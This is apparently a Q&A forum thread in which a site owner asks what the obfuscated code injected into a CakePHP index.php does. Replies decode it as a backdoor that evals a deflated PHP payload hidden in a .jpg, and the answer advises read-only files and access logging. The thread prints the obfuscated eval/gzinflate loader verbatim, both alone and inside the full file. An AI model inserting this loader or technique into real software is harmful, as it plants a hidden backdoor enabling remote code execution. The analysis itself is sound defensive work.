Is this a CakePHP hacking of some kind?

1
votes

I was contacted regarding some strange error messages on a CakePHP website the other day. We were seeing errors like the following:

Expectation Failed:
The expectation given in the Expect request-header field could not be met by this server.
             Expect: 100-continue, 100-continue
Only the 100-continue expectation is supported.

I ended up tracking down the random code in our index.php file:

$get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!`  mh(!3,da7*& H&    (a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'|
'!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:';
$wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);$set_yly_timeout();

It looks like some sort of scrambled / encrypted code, so I'm suspicious. But I don't know how to go about descrambling it. Anyone have any ideas about what this code was trying to do?

Edit: Here's the entire index.php file. Note: the hack code is back as of this morning :-/ Have been checking around on the server, but don't see how the code got put in (and the date modified date on the file remains unchanged since I edited it yesterday).


    
     * Copyright 2005-2007, Cake Software Foundation, Inc.
     *                              1785 E. Sahara Avenue, Suite 490-204
     *                              Las Vegas, Nevada 89104
     *
     * Licensed under The MIT License
     * Redistributions of files must retain the above copyright notice.
     *
     * @filesource
     * @copyright       Copyright 2005-2007, Cake Software Foundation, Inc.
     * @link                http://www.cakefoundation.org/projects/info/cakephp CakePHP(tm) Project
     * @package         cake
     * @subpackage      cake.app.webroot
     * @since           CakePHP(tm) v 0.2.9
     * @version         $Revision: 4450 $
     * @modifiedby      $LastChangedBy: phpnut $
     * @lastmodified    $Date: 2007-02-04 23:18:05 -0600 (Sun, 04 Feb 2007) $
     * @license         http://www.opensource.org/licenses/mit-license.php The MIT License
     */
    /**
     * Do not change
     */
        if (!defined('DS')) {
            define('DS', DIRECTORY_SEPARATOR);
        }
    /**
     * These defines should only be edited if you have cake installed in
     * a directory layout other than the way it is distributed.
     * Each define has a commented line of code that explains what you would change.
     *
     */
    $get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!`  mh(!3,da7*& H&(a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'|
    '!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:';
    $wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);$set_yly_timeout();
        if (!defined('ROOT')) {
            //define('ROOT', 'FULL PATH TO DIRECTORY WHERE APP DIRECTORY IS LOCATED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
            //You should also use the DS define to seperate your directories
            define('ROOT', dirname(dirname(dirname(__FILE__))));
        }
        if (!defined('APP_DIR')) {
            //define('APP_DIR', 'DIRECTORY NAME OF APPLICATION';
            define('APP_DIR', basename(dirname(dirname(__FILE__))));
        }
    /**
     * This only needs to be changed if the cake installed libs are located
     * outside of the distributed directory structure.
     */
        if (!defined('CAKE_CORE_INCLUDE_PATH')) {
            //define ('CAKE_CORE_INCLUDE_PATH', FULL PATH TO DIRECTORY WHERE CAKE CORE IS INSTALLED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
            //You should also use the DS define to seperate your directories
            define('CAKE_CORE_INCLUDE_PATH', ROOT);
        }
    ///////////////////////////////
    //DO NOT EDIT BELOW THIS LINE//
    ///////////////////////////////
        if (!defined('WEBROOT_DIR')) {
            define('WEBROOT_DIR', basename(dirname(__FILE__)));
        }
        if (!defined('WWW_ROOT')) {
            define('WWW_ROOT', dirname(__FILE__) . DS);
        }
        if (!defined('CORE_PATH')) {
            if (function_exists('ini_set')) {
                ini_set('include_path', CAKE_CORE_INCLUDE_PATH . PATH_SEPARATOR . ROOT . DS . APP_DIR . DS . PATH_SEPARATOR . ini_get('include_path'));
                define('APP_PATH', null);
                define('CORE_PATH', null);
            } else {
                define('APP_PATH', ROOT . DS . APP_DIR . DS);
                define('CORE_PATH', CAKE_CORE_INCLUDE_PATH . DS);
            }
        }
        require CORE_PATH . 'cake' . DS . 'bootstrap.php';
        if (isset($_GET['url']) && $_GET['url'] === 'favicon.ico') {
        } else {
            $Dispatcher = new Dispatcher();
            $Dispatcher->dispatch($url);
        }
        if (Configure::read() > 0) {
            echo "";
        }
    ?>

I'm starting to wonder if I need to update Cake, as it's currently v1.1 :-/

1
phpcakephpcode-injection
The code you posted is invalid, so it does nothing. I assume you only copied a part of the whole code, so I would say that the site has been tampered. Get in contact with the system administrator of the server so she get's informed that it has been manipulated. She should be able to give you further directions.hakre
No, that was all the code. The rest of it was the normal index.php file (<?php, etc). Does look pretty weird, doesn't it?acorncom
It does look really weird indeed. Although, the code has a valid syntax, it will throw a syntax error on runtime, but anyways, it doesn't make sense at all. I would remove it and see what happens, however, it doesn't seem to be causing the Expectation Failed response.luchomolina
Wow, this is really interesting. It seems that the code is just obfuscated in some way. After doing some debugging this is what I get: $get_ya_weekday_initial = 'eval(@gzinflate(file_get_contents("/home/felonius/new.felofiuqzih&9oc|h.#oogoc+wo3v2kpam|e$t:)vmunokl|/tmajckrH6tyevslwGrfcyvwgk~yjxo.ia%: )(#', $wp_cw_kses_split = 'create_function' and $set_yly_timeout = false. Since the last instruction is $set_yly_timeout(), and $set_yly_timeout is false, that throws a parse error. Odd.luchomolina
Where in the index.php is this code located?luchomolina

1 Answers

2
votes

Anyone have any ideas about what this code was trying to do?

The code in a more readable form is:

eval(@gzinflate(file_get_contents(".../persistent/KRFCstudio.jpg")));

It's sort of a backdoor script that has been obfuscated (if you want to know how, see the related question). It's resting in the code until a payload is provided.

The payload needs to be placed into

.../cake/s‌​cripts/templates/skel/tmp/cache/persistent/KRFCstudio.jpg

in form of DEFLATE data (RFC 1951) of PHP code (without the opening <?php tag), see gzinflate­Docs and eval­Docs.

Note: the hack code is back as of this morning :-/ Have been checking around on the server, but don't see how the code got put in (and the date modified date on the file remains unchanged since I edited it yesterday).

Make your changes to the file again. Then make the file read-only (as any of your php files should be on the server). When it is read-only check if it's still clean. Also ensure that the process reading the file in a standard web-request is not able to change file-permissions on the file, e.g. only allow root to do that.

Then log file access to the files on your site to find out when a file gets changed (or a process attempts to change a file).

As commented yesterday, you should contact the person responsible for the server. You already did that, right? You need to have someone who can look into the issue with you and who can talk with you about it.